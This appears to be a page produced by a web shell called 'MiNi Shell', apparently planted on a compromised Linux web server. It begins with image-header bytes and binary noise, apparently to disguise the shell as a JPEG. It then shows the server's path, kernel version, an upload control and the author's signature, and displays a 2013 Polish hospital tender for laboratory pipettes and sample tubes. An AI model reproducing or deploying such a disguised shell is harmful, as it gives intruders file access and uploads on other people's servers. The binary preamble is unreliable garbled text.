JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130828/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130828/346528-N-2013.html

<p class="kh_header"><b>Białogard: Dostawa pipet i sprzętu jednorazowego użytku do laboratorium</b><br>
<b>Numer ogłoszenia: 346528 - 2013; data zamieszczenia: 28.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Powiatowy , ul. Chopina 29, 78-200 Białogard, woj. zachodniopomorskie, tel. 094 312-02-66, faks 094 312-02-79.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa pipet i sprzętu jednorazowego użytku do laboratorium.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1
1.Pipety automatyczne 50 ul z automatycznym wyrzutem końcówek, system kalibracji umożliwiający szybką i dokładną kalibrację, posiadające podpórkę palca, wytrzymałe trzony, wyrzutnik dla prawo i leworęcznych, mechanizm uszczelniania końcówek, pipeta w całości autoklawowalna, jednokanałowa, gwarancja 36 miesięcy 1szt
2.Pipety automatyczne 100 ul z automatycznym wyrzutem końcówek, system kalibracji umożliwiający szybką i dokładną kalibrację, posiadające podpórkę palca, wytrzymałe trzony, wyrzutnik dla prawo i leworęcznych, mechanizm uszczelniania końcówek, pipeta w całości autoklawowalna, jednokanałowa, gwarancja 36 miesięcy	1szt
3.Pipety automatyczne 500 ul z automatycznym wyrzutem końcówek, system kalibracji umożliwiający szybką i dokładną kalibrację, posiadające podpórkę palca, wytrzymałe trzony, wyrzutnik dla prawo i leworęcznych, mechanizm uszczelniania końcówek, pipeta w całości autoklawowalna, jednokanałowa, gwarancja 36 miesięcy	1szt
4.Pipeta automatyczna nastawna w zakresie 10 - 100 ul z automatycznym wyrzutem końcówek, blokada nastaw pojemności, identyfikacja pojemności, podwójna nastawa pojemności, możliwość rekalibracji przez użytkownika, regulowany wyrzutnik, jednokanałowa, gwarancja 36 miesięcy 1szt
5.Pipeta automatyczna nastawna w zakresie 20 - 200 ul z automatycznym wyrzutem końcówek, blokada nastaw pojemności, identyfikacja pojemności, podwójna nastawa pojemności, możliwość rekalibracji przez użytkownika, regulowany wyrzutnik, jednokanałowa, gwarancja 36 miesięcy 1szt
6.Pipeta automatyczna nastawna w zakresie 1000 - 10000 ul z automatycznym wyrzutem końcówek, blokada nastaw pojemności, identyfikacja pojemności, podwójna nastawa pojemności, możliwość rekalibracji przez użytkownika, regulowany wyrzutnik, jednokanałowa, gwarancja 36 miesięcy 1szt

Zadanie 2

1.Probówka z PP, z korkiem , z napylonym K2 EDTA na 1 ml krwi z etykietą,
znacznik poziomu, numer serii i data ważności na każdej probówce 5000szt	
2.Probówka z korkiem  na 1,8 ml krwi z 3,2% cytrynianem sodu  z etykietą,
znacznik poziomu, numer serii i data ważności na każdej probówce 2000szt
3.Probówki z korkiem  na 0,9 ml krwi z 3,2% cytrynianem sodu  z etykietą , znacznik poziomu, numer serii i data ważności na każdej probówce 3000szt	
4.Probówka z przezroczystego PP 13x75 mm z granulatem i przyspieszaczem wykrzepiania z etykietą , numer serii i data ważności na każdej probówce 5000szt
5.Probówka z przezroczystego PP 14x100mmz granulatem i przyspieszaczem wykrzepiania - z etykietą , numer serii i data ważności na każdej probówce 2000szt
6.Zestaw do OB na 1 ml krwi : probówka z przekuwanym korkiem (0,8 ml krwi + 0,2ml	cytrynianu sodu) i rurka niewymagająca użycia tłoczka 3500szt
7.Probówka z PS 12x75 mm poj. 5 ml 24000szt
8.Probówka z PP typu Eppendorf z dnem stożkowym , płaskim korkiem,poj. 1,5 ml z polem do opisu  2000szt
9.Probówka stożkowa z PP z kołnierzem poj. 7 ml 	3500szt
10.Probówka stożkowa z PP z podziałką 0.5,1.0,2.5,5i10ml z kołnierzem poj. 10 ml 16x100mm	4000szt
11.Probówka z korkiem, na 2,5 ml krwi z KF+Na2 EDTA - z etykietą, znacznik poziomu numer serii i data ważności na każdej probówce	500szt
12.Probówka do separacji surowicy 200-250 ul krwi mikrometoda	1600szt
13.Probówki z EDTA K2 na 100 ul krwi mikrometoda	2000szt
14.Probówki z EDTA K2 na 200 ul krwi mikrometoda	500szt
15.Zestaw do oznaczania OB 150 ul krwi mikrometoda	800szt
16.Strzykawki na 2 ml krwi z heparyną litową - sterylne	1000szt
17.Kapilary do gazometrii o poj. 100-120 ul , OD 1,6mm, dl.125mm, heparyna Na+Li , wykonane z bardzo mocnego szkła	-8000szt
18.Kapilary do gazometrii o poj. 130 ul OD 2,35mm, dł 75mm, heparyna Li wykonane 	wykonane z bardzo mocnego szkła	1000szt
19.Zatyczki do kapilar do gazometrii o poj.100 ul, białe ,duże, gumowe, łatwo zdejmowalme	5000szt
20.Zatyczki do kapilar do gazometrii o poj.  powyżej  100 ul, białe ,duże, gumowe, 	łatwo zdejmowalne	1000szt
21.Mieszadełka do kapilar do gazometrii o poj. 100 ul	4000szt
22.Mieszadełka do kapilar do gazometrii o poj.  powyżej 100 ul	1000szt
23.Pojemnik z PP  na mocz  z podziałką , polem do opisu i zakrętką poj. 120 ml 	8000szt
24.Pojemnik z PP na kał z zakrętką i łopatką poj. 30 ml 	2000szt
25.Pojemnik z PS lub PP , ze szczelną pokrywką poj. 30 ml  sterylny 	1200szt
26.Wymazówka z drewna z wacikiem bawełnianym  sterylna, pakowana indywidualnie	7000szt
27.Wymazówka z tworzywa sztucznego z wacikiem wiskozowym w probówce 
transportowej sterylna 2500szt	
28.Wymazówka z tworzywa sztucznego z wacikiem wiskozowym w probówce 	z podłożem AMIES sterylna	2500szt
29.Pipeta 3ml o dług. 150 mm poj. całk. 7 ml z podziałką : 0,5/1,0/1,5/2,0/2,5/3,0ml sterylna pakowana indywidualnie	2000szt
30.Pojemnik na 25 szkiełek z przezroczystym zamknięciem , z możliwością łączenia 	z innymi pojemnikami	50szt
31.Torebki o wym.15x20cm na próbki z zamknięciem typu snap z przezroczystego PE	600szt
32.Torebki o wym.20x25cm na próbki z zamknięciem typu snap z przezroczystego PE	1200szt
33.Nożyk stalowy do nakłuć do pobrań krwi, pakowany indywidualnie , sterylny 	7000szt
34.Nakłuwacze automatyczne  typ MEDLANCE igła 1,8mm 	3500szt
35.Nakłuwacze automatyczne  typ MEDLANCE nożyk  1,0mm 	600szt
36.Końcówki do pipet o poj.  do 200ul żółte	20000szt
37.Końcówki do pipet o poj.  200 - 1000ul niebieskie	10000szt
38.Końcówki do pipet bezbarwne uniwersalne 1000 - 5000 ul	1000szt
39.Końcówka do pipet 1000-10000 ul typ HTL	1000szt
40.Szkiełka mikroskopowe podst. gr. 1,5-2,0mm z ciętymi krawędziami do zastosowań ogólnolaboratoryjnych	 1000szt
41.Szkiełka mikroskopowe nakrywkowe  o wym. 20x20mm	12000szt
42.Bagietki  proste o śr. 4 mm i dług. 125-150mm z PP	 800szt
43.Kuwety  mikro z dwiema ściankami optycznie gładkimi poj. 05 - 2,0 ml	500szt.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony jeżeli Wykonawca załączy do oferty oświadczenie zgodnie z art. 22 ust. 1 ustawy, sporządzone na załączniku do SIWZ. Zamawiający oceni spełnienie przez Wykonawcę powyższego warunku zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony jeżeli Wykonawca załączy do oferty oświadczenie zgodnie z art. 22 ust. 1 ustawy, sporządzone na załączniku do SIWZ. Zamawiający oceni spełnienie przez Wykonawcę powyższego warunku zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony jeżeli Wykonawca załączy do oferty oświadczenie zgodnie z art. 22 ust. 1 ustawy, sporządzone na załączniku do SIWZ. Zamawiający oceni spełnienie przez Wykonawcę powyższego warunku zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony jeżeli Wykonawca załączy do oferty oświadczenie zgodnie z art. 22 ust. 1 ustawy, sporządzone na załączniku do SIWZ. Zamawiający oceni spełnienie przez Wykonawcę powyższego warunku zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony jeżeli Wykonawca załączy do oferty oświadczenie zgodnie z art. 22 ust. 1 ustawy, sporządzone na załączniku do SIWZ. Zamawiający oceni spełnienie przez Wykonawcę powyższego warunku zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalbialogard.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Powiatowy
ul. Chopina 29
78-200 Białogard.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.09.2013 godzina 10:00, miejsce: Szpital Powiatowy
ul. Chopina 29
78-200 Białogard
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Otwarcie ofert odbędzie się 05.09.2013r. o godz. 11:00, w siedzibie Zamawiającego: Szpital Powiatowy w Białogardzie, ul. Chopina 29, 78-200 Białogard, DZIAŁ ZAMÓWIEŃ PUBLICZNYCH - III piętro, p. 343. Osobą uprawnioną do kontaktu z Wykonawcami jest - w przedmiocie formalnym: Inspektor ds. zamówień publicznych - p. Urszula Pacześniak - e-mail upaczesniak@szpitalbialogard.pl - p. Malgorzata Kojder - e-mail mkojder@szpitalbialogard.pl....</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com